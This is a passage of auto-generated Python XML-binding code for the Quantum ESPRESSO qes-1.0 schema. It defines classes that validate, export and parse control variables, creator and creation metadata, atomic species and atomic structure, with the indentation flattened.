enumerations = ['from_scratch', 'restart']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on controlRestartModeType' % {"value" : value.encode("utf-8")} )
def validate_lowhighType(self, value):
# Validate type lowhighType, a restriction on string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['low', 'high']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on lowhighType' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.title is not None or
self.calculation != "scf" or
self.restart_mode != "from_scratch" or
self.prefix is not None or
self.pseudo_dir is not None or
self.outdir is not None or
self.stress is not None or
self.forces is not None or
self.wf_collect or
self.disk_io != "low" or
self.max_seconds is not None or
self.nstep is not None or
self.etot_conv_thr != 1.0e-5 or
self.forc_conv_thr != 1.0e-3 or
self.press_conv_thr != 5e-1 or
self.verbosity != "low" or
self.print_every is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='control_variablesType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('control_variablesType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='control_variablesType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='control_variablesType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='control_variablesType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='control_variablesType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.title is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:title>%s</qes:title>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.title), input_name='title')), eol_))
if self.calculation is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:calculation>%s</qes:calculation>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.calculation), input_name='calculation')), eol_))
if self.restart_mode is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:restart_mode>%s</qes:restart_mode>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.restart_mode), input_name='restart_mode')), eol_))
if self.prefix is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:prefix>%s</qes:prefix>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.prefix), input_name='prefix')), eol_))
if self.pseudo_dir is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:pseudo_dir>%s</qes:pseudo_dir>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.pseudo_dir), input_name='pseudo_dir')), eol_))
if self.outdir is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:outdir>%s</qes:outdir>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.outdir), input_name='outdir')), eol_))
if self.stress is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:stress>%s</qes:stress>%s' % (self.gds_format_boolean(self.stress, input_name='stress'), eol_))
if self.forces is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:forces>%s</qes:forces>%s' % (self.gds_format_boolean(self.forces, input_name='forces'), eol_))
if self.wf_collect is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:wf_collect>%s</qes:wf_collect>%s' % (self.gds_format_boolean(self.wf_collect, input_name='wf_collect'), eol_))
if self.disk_io is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:disk_io>%s</qes:disk_io>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.disk_io), input_name='disk_io')), eol_))
if self.max_seconds is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:max_seconds>%s</qes:max_seconds>%s' % (self.gds_format_integer(self.max_seconds, input_name='max_seconds'), eol_))
if self.nstep is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nstep>%s</qes:nstep>%s' % (self.gds_format_integer(self.nstep, input_name='nstep'), eol_))
if self.etot_conv_thr is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:etot_conv_thr>%s</qes:etot_conv_thr>%s' % (self.gds_format_double(self.etot_conv_thr, input_name='etot_conv_thr'), eol_))
if self.forc_conv_thr is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:forc_conv_thr>%s</qes:forc_conv_thr>%s' % (self.gds_format_double(self.forc_conv_thr, input_name='forc_conv_thr'), eol_))
if self.press_conv_thr is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:press_conv_thr>%s</qes:press_conv_thr>%s' % (self.gds_format_double(self.press_conv_thr, input_name='press_conv_thr'), eol_))
if self.verbosity is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:verbosity>%s</qes:verbosity>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.verbosity), input_name='verbosity')), eol_))
if self.print_every is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:print_every>%s</qes:print_every>%s' % (self.gds_format_integer(self.print_every, input_name='print_every'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'title':
title_ = child_.text
title_ = self.gds_validate_string(title_, node, 'title')
self.title = title_
elif nodeName_ == 'calculation':
calculation_ = child_.text
calculation_ = self.gds_validate_string(calculation_, node, 'calculation')
self.calculation = calculation_
# validate type calculationType
self.validate_calculationType(self.calculation)
elif nodeName_ == 'restart_mode':
restart_mode_ = child_.text
restart_mode_ = self.gds_validate_string(restart_mode_, node, 'restart_mode')
self.restart_mode = restart_mode_
# validate type controlRestartModeType
self.validate_controlRestartModeType(self.restart_mode)
elif nodeName_ == 'prefix':
prefix_ = child_.text
prefix_ = self.gds_validate_string(prefix_, node, 'prefix')
self.prefix = prefix_
elif nodeName_ == 'pseudo_dir':
pseudo_dir_ = child_.text
pseudo_dir_ = self.gds_validate_string(pseudo_dir_, node, 'pseudo_dir')
self.pseudo_dir = pseudo_dir_
elif nodeName_ == 'outdir':
outdir_ = child_.text
outdir_ = self.gds_validate_string(outdir_, node, 'outdir')
self.outdir = outdir_
elif nodeName_ == 'stress':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'stress')
self.stress = ival_
elif nodeName_ == 'forces':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'forces')
self.forces = ival_
elif nodeName_ == 'wf_collect':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'wf_collect')
self.wf_collect = ival_
elif nodeName_ == 'disk_io':
disk_io_ = child_.text
disk_io_ = self.gds_validate_string(disk_io_, node, 'disk_io')
self.disk_io = disk_io_
# validate type lowhighType
self.validate_lowhighType(self.disk_io)
elif nodeName_ == 'max_seconds' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'max_seconds')
self.max_seconds = ival_
elif nodeName_ == 'nstep' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'nstep')
self.nstep = ival_
elif nodeName_ == 'etot_conv_thr' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'etot_conv_thr')
self.etot_conv_thr = fval_
elif nodeName_ == 'forc_conv_thr' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'forc_conv_thr')
self.forc_conv_thr = fval_
elif nodeName_ == 'press_conv_thr' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'press_conv_thr')
self.press_conv_thr = fval_
elif nodeName_ == 'verbosity':
verbosity_ = child_.text
verbosity_ = self.gds_validate_string(verbosity_, node, 'verbosity')
self.verbosity = verbosity_
# validate type lowhighType
self.validate_lowhighType(self.verbosity)
elif nodeName_ == 'print_every' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'print_every')
self.print_every = ival_
# end class control_variablesType
class xml_formatType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, NAME=None, VERSION=None, valueOf_=None):
self.original_tagname_ = None
self.NAME = _cast(None, NAME)
self.VERSION = _cast(None, VERSION)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, xml_formatType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if xml_formatType.subclass:
return xml_formatType.subclass(*args_, **kwargs_)
else:
return xml_formatType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_NAME(self): return self.NAME
def set_NAME(self, NAME): self.NAME = NAME
def get_VERSION(self): return self.VERSION
def set_VERSION(self, VERSION): self.VERSION = VERSION
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='xml_formatType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('xml_formatType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='xml_formatType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='xml_formatType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='xml_formatType'):
if self.NAME is not None and 'NAME' not in already_processed:
already_processed.add('NAME')
outfile.write(' NAME=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.NAME), input_name='NAME')), ))
if self.VERSION is not None and 'VERSION' not in already_processed:
already_processed.add('VERSION')
outfile.write(' VERSION=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.VERSION), input_name='VERSION')), ))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='xml_formatType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('NAME', node)
if value is not None and 'NAME' not in already_processed:
already_processed.add('NAME')
self.NAME = value
value = find_attr_value_('VERSION', node)
if value is not None and 'VERSION' not in already_processed:
already_processed.add('VERSION')
self.VERSION = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class xml_formatType
class creatorType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, NAME=None, VERSION=None, valueOf_=None):
self.original_tagname_ = None
self.NAME = _cast(None, NAME)
self.VERSION = _cast(None, VERSION)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, creatorType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if creatorType.subclass:
return creatorType.subclass(*args_, **kwargs_)
else:
return creatorType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_NAME(self): return self.NAME
def set_NAME(self, NAME): self.NAME = NAME
def get_VERSION(self): return self.VERSION
def set_VERSION(self, VERSION): self.VERSION = VERSION
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='creatorType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('creatorType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='creatorType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='creatorType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='creatorType'):
if self.NAME is not None and 'NAME' not in already_processed:
already_processed.add('NAME')
outfile.write(' NAME=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.NAME), input_name='NAME')), ))
if self.VERSION is not None and 'VERSION' not in already_processed:
already_processed.add('VERSION')
outfile.write(' VERSION=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.VERSION), input_name='VERSION')), ))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='creatorType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('NAME', node)
if value is not None and 'NAME' not in already_processed:
already_processed.add('NAME')
self.NAME = value
value = find_attr_value_('VERSION', node)
if value is not None and 'VERSION' not in already_processed:
already_processed.add('VERSION')
self.VERSION = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class creatorType
class createdType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, DATE=None, TIME=None, valueOf_=None):
self.original_tagname_ = None
self.DATE = _cast(None, DATE)
self.TIME = _cast(None, TIME)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, createdType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if createdType.subclass:
return createdType.subclass(*args_, **kwargs_)
else:
return createdType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_DATE(self): return self.DATE
def set_DATE(self, DATE): self.DATE = DATE
def get_TIME(self): return self.TIME
def set_TIME(self, TIME): self.TIME = TIME
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='createdType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('createdType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='createdType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='createdType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='createdType'):
if self.DATE is not None and 'DATE' not in already_processed:
already_processed.add('DATE')
outfile.write(' DATE=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.DATE), input_name='DATE')), ))
if self.TIME is not None and 'TIME' not in already_processed:
already_processed.add('TIME')
outfile.write(' TIME=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.TIME), input_name='TIME')), ))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='createdType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('DATE', node)
if value is not None and 'DATE' not in already_processed:
already_processed.add('DATE')
self.DATE = value
value = find_attr_value_('TIME', node)
if value is not None and 'TIME' not in already_processed:
already_processed.add('TIME')
self.TIME = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class createdType
class atomic_speciesType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, ntyp=None, pseudo_dir=None, species=None):
self.original_tagname_ = None
self.ntyp = _cast(int, ntyp)
self.pseudo_dir = _cast(None, pseudo_dir)
if species is None:
self.species = []
else:
self.species = species
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, atomic_speciesType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if atomic_speciesType.subclass:
return atomic_speciesType.subclass(*args_, **kwargs_)
else:
return atomic_speciesType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_species(self): return self.species
def set_species(self, species): self.species = species
def add_species(self, value): self.species.append(value)
def insert_species_at(self, index, value): self.species.insert(index, value)
def replace_species_at(self, index, value): self.species[index] = value
def get_ntyp(self): return self.ntyp
def set_ntyp(self, ntyp): self.ntyp = ntyp
def get_pseudo_dir(self): return self.pseudo_dir
def set_pseudo_dir(self, pseudo_dir): self.pseudo_dir = pseudo_dir
def hasContent_(self):
if (
self.species
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='atomic_speciesType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('atomic_speciesType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='atomic_speciesType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='atomic_speciesType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='atomic_speciesType'):
if self.ntyp is not None and 'ntyp' not in already_processed:
already_processed.add('ntyp')
outfile.write(' ntyp="%s"' % self.gds_format_integer(self.ntyp, input_name='ntyp'))
if self.pseudo_dir is not None and 'pseudo_dir' not in already_processed:
already_processed.add('pseudo_dir')
outfile.write(' pseudo_dir=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.pseudo_dir), input_name='pseudo_dir')), ))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='atomic_speciesType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for species_ in self.species:
species_.export(outfile, level, namespaceprefix_, name_='species', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('ntyp', node)
if value is not None and 'ntyp' not in already_processed:
already_processed.add('ntyp')
try:
self.ntyp = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.ntyp <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
value = find_attr_value_('pseudo_dir', node)
if value is not None and 'pseudo_dir' not in already_processed:
already_processed.add('pseudo_dir')
self.pseudo_dir = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'species':
obj_ = speciesType.factory()
obj_.build(child_)
self.species.append(obj_)
obj_.original_tagname_ = 'species'
# end class atomic_speciesType
class speciesType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, name=None, mass=None, pseudo_file=None, starting_magnetization=0.0, spin_teta=None, spin_phi=None):
self.original_tagname_ = None
self.name = _cast(None, name)
self.mass = mass
self.pseudo_file = pseudo_file
self.starting_magnetization = starting_magnetization
self.spin_teta = spin_teta
self.spin_phi = spin_phi
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, speciesType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if speciesType.subclass:
return speciesType.subclass(*args_, **kwargs_)
else:
return speciesType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_mass(self): return self.mass
def set_mass(self, mass): self.mass = mass
def get_pseudo_file(self): return self.pseudo_file
def set_pseudo_file(self, pseudo_file): self.pseudo_file = pseudo_file
def get_starting_magnetization(self): return self.starting_magnetization
def set_starting_magnetization(self, starting_magnetization): self.starting_magnetization = starting_magnetization
def get_spin_teta(self): return self.spin_teta
def set_spin_teta(self, spin_teta): self.spin_teta = spin_teta
def get_spin_phi(self): return self.spin_phi
def set_spin_phi(self, spin_phi): self.spin_phi = spin_phi
def get_name(self): return self.name
def set_name(self, name): self.name = name
def hasContent_(self):
if (
self.mass is not None or
self.pseudo_file is not None or
self.starting_magnetization != 0.0 or
self.spin_teta is not None or
self.spin_phi is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='speciesType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('speciesType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='speciesType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='speciesType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='speciesType'):
if self.name is not None and 'name' not in already_processed:
already_processed.add('name')
outfile.write(' name=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.name), input_name='name')), ))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='speciesType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.mass is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:mass>%s</qes:mass>%s' % (self.gds_format_double(self.mass, input_name='mass'), eol_))
if self.pseudo_file is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:pseudo_file>%s</qes:pseudo_file>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.pseudo_file), input_name='pseudo_file')), eol_))
if self.starting_magnetization != 0.0:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:starting_magnetization>%s</qes:starting_magnetization>%s' % (self.gds_format_double(self.starting_magnetization, input_name='starting_magnetization'), eol_))
if self.spin_teta is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:spin_teta>%s</qes:spin_teta>%s' % (self.gds_format_double(self.spin_teta, input_name='spin_teta'), eol_))
if self.spin_phi is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:spin_phi>%s</qes:spin_phi>%s' % (self.gds_format_double(self.spin_phi, input_name='spin_phi'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('name', node)
if value is not None and 'name' not in already_processed:
already_processed.add('name')
self.name = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'mass' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'mass')
self.mass = fval_
elif nodeName_ == 'pseudo_file':
pseudo_file_ = child_.text
pseudo_file_ = self.gds_validate_string(pseudo_file_, node, 'pseudo_file')
self.pseudo_file = pseudo_file_
elif nodeName_ == 'starting_magnetization' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'starting_magnetization')
self.starting_magnetization = fval_
elif nodeName_ == 'spin_teta' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'spin_teta')
self.spin_teta = fval_
elif nodeName_ == 'spin_phi' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'spin_phi')
self.spin_phi = fval_
# end class speciesType
class atomic_structureType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, nat=None, alat=None, bravais_index=None, atomic_positions=None, wyckoff_positions=None, crystal_positions=None, cell=None):
self.original_tagname_ = None
self.nat = _cast(int, nat)
self.alat = _cast(float, alat)
self.bravais_index = _cast(int, bravais_index)
self.atomic_positions = atomic_positions
self.wyckoff_positions = wyckoff_positions
self.crystal_positions = crystal_positions
self.cell = cell
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, atomic_structureType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if atomic_structureType.subclass:
return atomic_structureType.subclass(*args_, **kwargs_)
else:
return atomic_structureType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_atomic_positions(self): return self.atomic_positions
def set_atomic_positions(self, atomic_positions): self.atomic_positions = atomic_positions
def get_wyckoff_positions(self): return self.wyckoff_positions
def set_wyckoff_positions(self, wyckoff_positions): self.wyckoff_positions = wyckoff_positions
def get_crystal_positions(self): return self.crystal_positions
def set_crystal_positions(self, crystal_positions): self.crystal_positions = crystal_positions
def get_cell(self): return self.cell
def set_cell(self, cell): self.cell = cell
def get_nat(self): return self.nat
def set_nat(self, nat): self.nat = nat
def get_alat(self): return self.alat
def set_alat(self, alat): self.alat = alat
def get_bravais_index(self): return self.bravais_index
